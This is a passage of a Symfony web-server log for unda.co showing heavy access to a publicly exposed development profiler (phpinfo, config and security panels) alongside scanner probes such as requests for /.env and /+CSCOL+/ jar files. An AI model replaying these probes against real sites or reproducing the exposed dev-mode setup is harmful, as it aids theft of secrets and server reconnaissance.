  5461. [2025-12-19 11:22:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"465dd0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/465dd0?panel=twig","method":"GET"} []
  5462. [2025-12-19 11:22:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  5463. [2025-12-19 11:32:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"465dd0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/465dd0?panel=time","method":"GET"} []
  5464. [2025-12-19 11:32:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5465. [2025-12-19 11:39:16] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  5466. [2025-12-19 11:40:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"07a9c5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/07a9c5?panel=cache","method":"GET"} []
  5467. [2025-12-19 11:40:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  5468. [2025-12-19 11:40:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"465dd0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/465dd0?panel=security","method":"GET"} []
  5469. [2025-12-19 11:40:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  5470. [2025-12-19 11:48:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"465dd0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/465dd0?panel=request","method":"GET"} []
  5471. [2025-12-19 11:48:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  5472. [2025-12-19 11:54:29] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  5473. [2025-12-19 11:54:33] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  5474. [2025-12-19 11:56:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"465dd0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/465dd0?panel=config","method":"GET"} []
  5475. [2025-12-19 11:56:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  5476. [2025-12-19 11:58:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"04e5af","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/04e5af","method":"GET"} []
  5477. [2025-12-19 11:58:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  5478. [2025-12-19 11:59:19] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  5479. [2025-12-19 11:59:20] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  5480. [2025-12-19 12:05:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"465dd0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/465dd0?panel=cache","method":"GET"} []
  5481. [2025-12-19 12:05:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  5482. [2025-12-19 12:06:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"aa0429","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/aa0429?panel=request","method":"GET"} []
  5483. [2025-12-19 12:06:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  5484. [2025-12-19 12:12:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"465dd0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/465dd0","method":"GET"} []
  5485. [2025-12-19 12:12:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  5486. [2025-12-19 12:17:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a8e8fa","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/a8e8fa?panel=time","method":"GET"} []
  5487. [2025-12-19 12:17:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5488. [2025-12-19 12:17:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"479de6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/479de6?panel=db","method":"GET"} []
  5489. [2025-12-19 12:17:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  5490. [2025-12-19 12:18:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c86f8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c86f8?panel=validator","method":"GET"} []
  5491. [2025-12-19 12:18:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  5492. [2025-12-19 12:20:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5bace7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5bace7?panel=twig","method":"GET"} []
  5493. [2025-12-19 12:20:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  5494. [2025-12-19 12:20:33] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
  5495. [2025-12-19 12:21:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5496. [2025-12-19 12:26:57] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5497. [2025-12-19 12:27:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5bace7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5bace7?panel=time","method":"GET"} []
  5498. [2025-12-19 12:27:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5499. [2025-12-19 12:27:43] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
  5500. [2025-12-19 12:30:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"879f21","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/879f21","method":"GET"} []
  5501. [2025-12-19 12:30:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  5502. [2025-12-19 12:32:14] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  5503. [2025-12-19 12:34:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5bace7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5bace7?panel=security","method":"GET"} []
  5504. [2025-12-19 12:34:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  5505. [2025-12-19 12:40:00] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
  5506. [2025-12-19 12:42:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5bace7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5bace7?panel=request","method":"GET"} []
  5507. [2025-12-19 12:42:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  5508. [2025-12-19 12:47:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?ip=189.172.26.39&limit=10&method=GET","method":"GET"} []
  5509. [2025-12-19 12:47:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.26.39&limit=10&method=GET","method":"GET"} []
  5510. [2025-12-19 12:50:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5bace7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5bace7?panel=config","method":"GET"} []
  5511. [2025-12-19 12:50:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  5512. [2025-12-19 12:51:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b144c2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b144c2?panel=exception","method":"GET"} []
  5513. [2025-12-19 12:51:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  5514. [2025-12-19 12:54:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5515. [2025-12-19 12:54:48] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5516. [2025-12-19 12:57:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5bace7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5bace7?panel=cache","method":"GET"} []
  5517. [2025-12-19 12:57:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  5518. [2025-12-19 12:57:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44","method":"GET"} []
  5519. [2025-12-19 12:57:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  5520. [2025-12-19 13:04:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5bace7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5bace7","method":"GET"} []
  5521. [2025-12-19 13:04:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  5522. [2025-12-19 13:12:48] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5523. [2025-12-19 13:13:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5524. [2025-12-19 13:15:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7c6e2f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7c6e2f?panel=config","method":"GET"} []
  5525. [2025-12-19 13:15:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  5526. [2025-12-19 13:15:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5527. [2025-12-19 13:15:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5528. [2025-12-19 13:18:03] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://www.unda.co/_profiler/phpinfo","method":"GET"} []
  5529. [2025-12-19 13:19:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=66.249.66.45&limit=10","method":"GET"} []
  5530. [2025-12-19 13:19:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=66.249.66.45&limit=10","method":"GET"} []
  5531. [2025-12-19 13:22:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"873b32","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/873b32","method":"GET"} []
  5532. [2025-12-19 13:22:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  5533. [2025-12-19 13:24:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7c6e2f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7c6e2f","method":"GET"} []
  5534. [2025-12-19 13:24:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  5535. [2025-12-19 13:32:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"064ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/064ca9?panel=twig","method":"GET"} []
  5536. [2025-12-19 13:32:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  5537. [2025-12-19 13:34:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89d052","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/89d052?panel=validator","method":"GET"} []
  5538. [2025-12-19 13:34:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  5539. [2025-12-19 13:36:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"30fc6c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/30fc6c?panel=security","method":"GET"} []
  5540. [2025-12-19 13:36:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  5541. [2025-12-19 13:37:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"703e75","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/703e75?panel=time","method":"GET"} []
  5542. [2025-12-19 13:37:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5543. [2025-12-19 13:40:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"064ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/064ca9?panel=time","method":"GET"} []
  5544. [2025-12-19 13:40:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5545. [2025-12-19 13:42:19] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
  5546. [2025-12-19 13:44:04] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5547. [2025-12-19 13:47:03] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5548. [2025-12-19 13:48:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"064ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/064ca9?panel=security","method":"GET"} []
  5549. [2025-12-19 13:48:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  5550. [2025-12-19 13:48:39] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"201ee7","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/201ee7/search/results?ip=198.235.24.160&limit=10","method":"GET"} []
  5551. [2025-12-19 13:48:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=198.235.24.160&limit=10","method":"GET"} []
  5552. [2025-12-19 13:49:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5553. [2025-12-19 13:49:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  5554. [2025-12-19 13:56:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"064ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/064ca9?panel=config","method":"GET"} []
  5555. [2025-12-19 13:56:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  5556. [2025-12-19 13:59:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?ip=198.235.24.160&limit=10","method":"GET"} []
  5557. [2025-12-19 13:59:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=198.235.24.160&limit=10","method":"GET"} []
  5558. [2025-12-19 14:03:57] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  5559. [2025-12-19 14:03:58] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  5560. [2025-12-19 14:05:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"064ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/064ca9?panel=cache","method":"GET"} []
  5561. [2025-12-19 14:05:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  5562. [2025-12-19 14:07:49] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5563. [2025-12-19 14:09:29] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
  5564. [2025-12-19 14:12:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"628fdc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/628fdc?panel=logger","method":"GET"} []
